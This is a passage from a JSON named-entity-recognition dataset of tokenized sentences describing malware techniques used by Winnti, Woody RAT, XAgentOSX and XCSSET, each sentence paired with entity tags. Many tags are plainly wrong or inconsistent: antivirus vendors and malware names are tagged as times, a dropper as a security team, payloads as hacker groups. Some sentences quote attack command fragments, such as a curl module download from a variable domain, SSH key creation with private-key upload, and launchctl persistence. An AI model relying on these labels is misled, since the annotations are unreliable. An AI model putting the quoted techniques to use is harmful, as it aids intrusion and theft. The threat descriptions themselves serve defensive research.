"O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Linux", "has", "used", "HTTP", "in", "outbound", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "use", "a", "variant", "of", "the", "sysprep", "UAC", "bypass." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Winnti", "for", "Windows", "dropper", "can", "decrypt", "and", "decompresses", "a", "data", "blob." ], "ner_tags": [ "O", "B-Idus", "O", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "has", "the", "ability", "to", "encrypt", "and", "compress", "its", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "The", "Winnti", "for", "Windows", "dropper", "component", "can", "verify", "the", "existence", "of", "a", "single", "command", "line", "parameter", "and", "either", "terminate", "if", "it", "is", "not", "found", "or", "later", "use", "it", "as", "a", "decryption", "key." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-SecTeam", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Winnti", "for", "Windows", "HTTP/S", "C2", "mode", "can", "make", "use", "of", "an", "external", "proxy." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "delete", "the", "DLLs", "for", "its", "various", "components", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "check", "for", "the", "presence", "of", "specific", "files", "prior", "to", "moving", "to", "the", "next", "phase", "of", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Winnti", "for", "Windows", "dropper", "can", "place", "malicious", "payloads", "on", "targeted", "systems." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-SecTeam", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "The", "Winnti", "for", "Windows", "HTTP/S", "C2", "mode", "can", "make", "use", "of", "a", "local", "proxy." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Winnti", "for", "Windows", "implant", "file", "was", "named", "ASPNET_FILTER.DLL,", "mimicking", "the", "legitimate", "ASP.NET", "ISAPI", "filter", "DLL", "with", "the", "same", "name." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "use", "Native", "API", "to", "create", "a", "new", "process", "and", "to", "start", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "communicate", "using", "custom", "TCP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "B-HackOrg" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "check", "if", "the", "explorer.exe", "process", "is", "responsible", "for", "calling", "its", "install", "function." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "add", "a", "service", "named", "<code>wind0ws</code>", "to", "the", "Registry", "to", "achieve", "persistence", "after", "reboot." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Winnti", "for", "Windows", "installer", "loads", "a", "DLL", "using", "rundll32." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "run", "as", "a", "service", "using", "svchost.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "XOR", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-HackOrg", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "determine", "if", "the", "OS", "on", "a", "compromised", "host", "is", "newer", "than", "Windows", "XP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "can", "set", "the", "timestamps", "for", "its", "worker", "and", "service", "components", "to", "match", "that", "of", "cmd.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Winnti", "for", "Windows", "has", "the", "ability", "to", "use", "encapsulated", "HTTP/S", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Winnti", "for", "Windows", "sets", "its", "DLL", "file", "as", "a", "new", "service", "in", "the", "Registry", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "is", "believed", "that", "a", "patch", "management", "system", "for", "an", "anti-virus", "product", "commonly", "installed", "among", "targeted", "companies", "was", "used", "to", "distribute", "the", "Wiper", "malware." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Woody", "RAT", "can", "identify", "administrator", "accounts", "on", "an", "infected", "machine." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "use", "RSA-4096", "to", "encrypt", "data", "sent", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "collect", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "deobfuscate", "Base64-encoded", "strings", "and", "scripts." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "has", "used", "Base64", "encoded", "strings", "and", "scripts." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "exfiltrate", "files", "from", "an", "infected", "machine", "to", "its", "C2", "server." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "has", "relied", "on", "CVE-2022-30190", "(Follina)", "for", "execution", "during", "delivery." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "has", "the", "ability", "to", "delete", "itself", "from", "disk", "by", "creating", "a", "suspended", "notepad", "process", "and", "writing", "shellcode", "to", "delete", "a", "file", "into", "the", "suspended", "process", "using", "`NtWriteVirtualMemory`." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "list", "all", "files", "and", "their", "associated", "attributes,", "including", "filename,", "type,", "owner,", "creation", "time,", "last", "access", "time,", "last", "write", "time,", "size,", "and", "permissions." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "has", "suppressed", "all", "error", "reporting", "by", "calling", "`SetErrorMode`", "with", "0x8007", "as", "a", "parameter." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "download", "files", "from", "its", "C2", "server,", "including", "the", ".NET", "DLLs,", "`WoodySharpExecutor`", "and", "`WoodyPowerSession`." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "B-SecTeam", "O", "B-SecTeam" ] }, { "tokens": [ "Woody", "RAT", "can", "make", "`Ping`", "GET", "HTTP", "requests", "to", "its", "C2", "server", "at", "regular", "intervals", "for", "network", "connectivity", "checks." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "has", "relied", "on", "users", "opening", "a", "malicious", "email", "attachment", "for", "execution." ], "ner_tags": [ "B-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "use", "multiple", "native", "APIs,", "including", "`WriteProcessMemory`,", "`CreateProcess`,", "and", "`CreateRemoteThread`", "for", "process", "injection." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "execute", "PowerShell", "commands", "and", "scripts", "with", "the", "use", "of", ".NET", "DLL,", "`WoodyPowerSession`." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "call", "`NtQuerySystemProcessInformation`", "with", "`SystemProcessInformation`", "to", "enumerate", "all", "running", "processes,", "including", "associated", "information", "such", "as", "PID,", "parent", "PID,", "image", "name,", "and", "owner." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "create", "a", "suspended", "notepad", "process", "and", "write", "shellcode", "to", "delete", "a", "file", "into", "the", "suspended", "process", "using", "`NtWriteVirtualMemory`." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "inject", "code", "into", "a", "targeted", "process", "by", "writing", "to", "the", "remote", "memory", "of", "an", "infected", "system", "and", "then", "create", "a", "remote", "thread." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "search", "registry", "keys", "to", "identify", "antivirus", "programs", "on", "an", "compromised", "host." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "has", "the", "ability", "to", "take", "a", "screenshot", "of", "the", "infected", "host", "desktop", "using", "Windows", "GDI+." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "detect", "Avast", "Software,", "Doctor", "Web,", "Kaspersky,", "AVG,", "ESET,", "and", "Sophos", "antivirus", "programs." ], "ner_tags": [ "B-SecTeam", "B-SecTeam", "O", "O", "B-Way", "B-Tool", "I-Tool", "O", "B-Time", "B-Way", "B-Time", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "collect", ".NET,", "PowerShell,", "and", "Python", "information", "from", "an", "infected", "host." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "B-Features", "B-SamFile", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "has", "been", "delivered", "via", "malicious", "Word", "documents", "and", "archive", "files." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "use", "AES-CBC", "to", "encrypt", "data", "sent", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "retrieve", "the", "following", "information", "from", "an", "infected", "machine:", "OS,", "architecture,", "computer", "name,", "OS", "build", "version,", "environment", "variables,", "and", "storage", "drives." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "retrieve", "network", "interface", "and", "proxy", "information." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "retrieve", "a", "list", "of", "user", "accounts", "and", "usernames", "from", "an", "infected", "machine." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "B-Features", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "communicate", "with", "its", "C2", "server", "using", "HTTP", "requests." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Woody", "RAT", "can", "execute", "commands", "using", "`cmd.exe`." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "getFirefoxPassword", "function", "to", "attempt", "to", "locate", "Firefox", "passwords." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "deletFileFromPath", "function", "to", "delete", "a", "specified", "file", "using", "the", "NSFileManager:removeFileAtPath", "method." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "ftpUpload", "function", "to", "use", "the", "FTPManager:uploadFile", "method", "to", "upload", "files", "from", "the", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "readFiles", "function", "to", "return", "a", "detailed", "listing", "(sometimes", "recursive)", "of", "a", "specified", "directory.", "XAgentOSX", "contains", "the", "showBackupIosFolder", "function", "to", "check", "for", "IOS", "device", "backups", "by", "running", "<code>ls", "-la", "~/Library/Application\\", "Support/MobileSync/Backup/</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XAgentOSX", "contains", "keylogging", "functionality", "that", "will", "monitor", "for", "active", "application", "windows", "and", "write", "them", "to", "the", "log,", "it", "can", "handle", "special", "characters,", "and", "it", "will", "buffer", "by", "default", "50", "characters", "before", "sending", "them", "out", "over", "the", "C2", "infrastructure." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "execFile", "function", "to", "execute", "a", "specified", "file", "on", "the", "system", "using", "the", "NSTask:launch", "method." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "getProcessList", "function", "to", "run", "<code>ps", "aux</code>", "to", "get", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "takeScreenShot", "(along", "with", "startTakeScreenShot", "and", "stopTakeScreenShot)", "functions", "to", "take", "screenshots", "using", "the", "CGGetActiveDisplayList,", "CGDisplayCreateImage,", "and", "NSImage:initWithCGImage", "methods." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "I-Features", "B-HackOrg", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "getInstalledAPP", "function", "to", "run", "<code>ls", "-la", "/Applications</code>", "to", "gather", "what", "applications", "are", "installed." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XAgentOSX", "contains", "the", "getInfoOSX", "function", "to", "return", "the", "OS", "X", "version", "as", "well", "as", "the", "current", "user." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "attempts", "to", "discover", "accounts", "from", "various", "locations", "such", "as", "a", "user's", "Evernote,", "AppleID,", "Telegram,", "Skype,", "and", "WeChat", "data." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "XCSSET", "will", "compress", "entire", "<code>~/Desktop</code>", "folders", "excluding", "all", "<code>.git</code>", "folders,", "but", "only", "if", "the", "total", "data", "size", "is", "under", "200MB." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "uses", "a", "malicious", "browser", "application", "to", "replace", "the", "legitimate", "browser", "in", "order", "to", "continuously", "capture", "credentials,", "monitor", "web", "traffic,", "and", "download", "additional", "modules." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Features", "I-Features", "B-Way", "O", "O", "O", "O", "I-Features", "O", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "XCSSET", "adds", "malicious", "code", "to", "a", "host's", "Xcode", "projects", "by", "enumerating", "CocoaPods", "<code>target_integrator.rb</code>", "files", "under", "the", "<code>/Library/Ruby/Gems</code>", "folder", "or", "enumerates", "all", "<code>.xcodeproj</code>", "folders", "under", "a", "given", "directory.", "XCSSET", "then", "downloads", "a", "script", "and", "Mach-O", "file", "into", "the", "Xcode", "project", "folder." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "performs", "AES-CBC", "encryption", "on", "files", "under", "<code>~/Documents</code>,", "<code>~/Downloads</code>,", "and", "<code>~/Desktop</code>", "with", "a", "fixed", "key", "and", "renames", "files", "to", "give", "them", "a", "<code>.enc</code>", "extension.", "Only", "files", "with", "sizes", "less", "than", "500MB", "are", "encrypted." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "collects", "contacts", "and", "application", "data", "from", "files", "in", "Desktop,", "Documents,", "Downloads,", "Dropbox,", "and", "WeChat", "folders." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "XCSSET", "adds", "malicious", "file", "paths", "to", "the", "<code>DYLD_FRAMEWORK_PATH</code>", "and", "<code>DYLD_LIBRARY_PATH</code>", "environment", "variables", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "exfiltrates", "data", "stolen", "from", "a", "system", "over", "its", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "has", "used", "a", "zero-day", "exploit", "in", "the", "ssh", "launchdaemon", "to", "elevate", "privileges", "and", "bypass", "SIP." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Features", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "has", "used", "`mdfind`", "to", "enumerate", "a", "list", "of", "apps", "known", "to", "grant", "screen", "sharing", "permissions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "B-Features" ] }, { "tokens": [ "XCSSET", "prompts", "the", "user", "to", "input", "credentials", "using", "a", "native", "macOS", "dialog", "box", "leveraging", "the", "system", "process", "<code>/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "has", "dropped", "a", "malicious", "applet", "into", "an", "app's", "`.../Contents/MacOS/`", "folder", "of", "a", "previously", "launched", "app", "to", "bypass", "Gatekeeper's", "security", "checks", "on", "first", "launch", "apps", "(prior", "to", "macOS", "13)." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "uses", "a", "hidden", "folder", "named", "<code>.xcassets</code>", "and", "<code>.git</code>", "to", "embed", "itself", "in", "Xcode." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "downloads", "browser", "specific", "AppleScript", "modules", "using", "a", "constructed", "URL", "with", "the", "<code>curl</code>", "command,", "<code>https://\"", "&", "domain", "&", "\"/agent/scripts/\"", "&", "moduleName", "&", "\".applescript</code>." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "uses", "the", "ssh", "launchdaemon", "to", "elevate", "privileges,", "bypass", "system", "controls,", "and", "enable", "remote", "access", "to", "the", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "loads", "a", "system", "level", "launchdaemon", "using", "the", "<code>launchctl", "load", "-w</code>", "command", "from", "<code>/System/Librarby/LaunchDaemons/ssh.plist</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "uses", "the", "<code>chmod", "+x</code>", "command", "to", "grant", "executable", "permissions", "to", "the", "malicious", "file." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "builds", "a", "malicious", "application", "bundle", "to", "resemble", "Safari", "through", "using", "the", "Safari", "icon", "and", "<code>Info.plist</code>." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-SamFile" ] }, { "tokens": [ "XCSSET", "uses", "the", "<code>plutil</code>", "command", "to", "modify", "the", "<code>LSUIElement</code>,", "<code>DFBundleDisplayName</code>,", "and", "<code>CFBundleIdentifier</code>", "keys", "in", "the", "<code>/Contents/Info.plist</code>", "file", "to", "change", "how", "XCSSET", "is", "visible", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "will", "create", "an", "ssh", "key", "if", "necessary", "with", "the", "<code>ssh-keygen", "-t", "rsa", "-f", "$HOME/.ssh/id_rsa", "-P</code>", "command.", "XCSSET", "will", "upload", "a", "private", "key", "file", "to", "the", "server", "to", "remotely", "access", "the", "host", "without", "a", "password." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "saves", "a", "screen", "capture", "of", "the", "victim's", "system", "with", "a", "numbered", "filename", "and", "<code>.jpg</code>", "extension.", "Screen", "captures", "are", "taken", "at", "specified", "intervals", "based", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "searches", "firewall", "configuration", "files", "located", "in", "<code>/Library/Preferences/</code>", "and", "uses", "<code>csrutil", "status</code>", "to", "determine", "if", "System", "Integrity", "Protection", "is", "enabled." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "uses", "<code>ps", "aux</code>", "with", "the", "<code>grep</code>", "command", "to", "enumerate", "common", "browsers", "and", "system", "processes", "potentially", "impacting", "XCSSET's", "exfiltration", "capabilities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "uses", "<code>scp</code>", "to", "access", "the", "<code>~/Library/Cookies/Cookies.binarycookies</code>", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "XCSSET", "uses", "RC4", "encryption", "over", "TCP", "to", "communicate", "with", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "identifies", "the", "macOS", "version", "and", "uses", "<code>ioreg</code>", "to", "determine", "serial", "number." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "XCSSET", "uses", "AppleScript", "to", "check", "the", "host's", "language", "and", "location", "with", "the", "command", "<code>user", "locale", "of", "(get", "system", "info)</code>." ], "ner_tags": [ "B-Time", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "the", "machine's", "local", "time,", "XCSSET", "waits", "43200", "seconds", "(12", "hours)", "from", "the", "initial", "creation", "timestamp", "of", "a", "specific", "file,", "<code>.report</code>.", "After", "the", "elapsed", "time,", "XCSSET", "executes", "additional", "modules." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O" ] }, { "tokens": [ "XCSSET", "uses", "a", "shell", "script", "to", "execute", "Mach-o", "files", "and", "<code>osacompile</code>", "commands", "such", "as,", "<code>osacompile", "-x", "-o", "xcode.app", 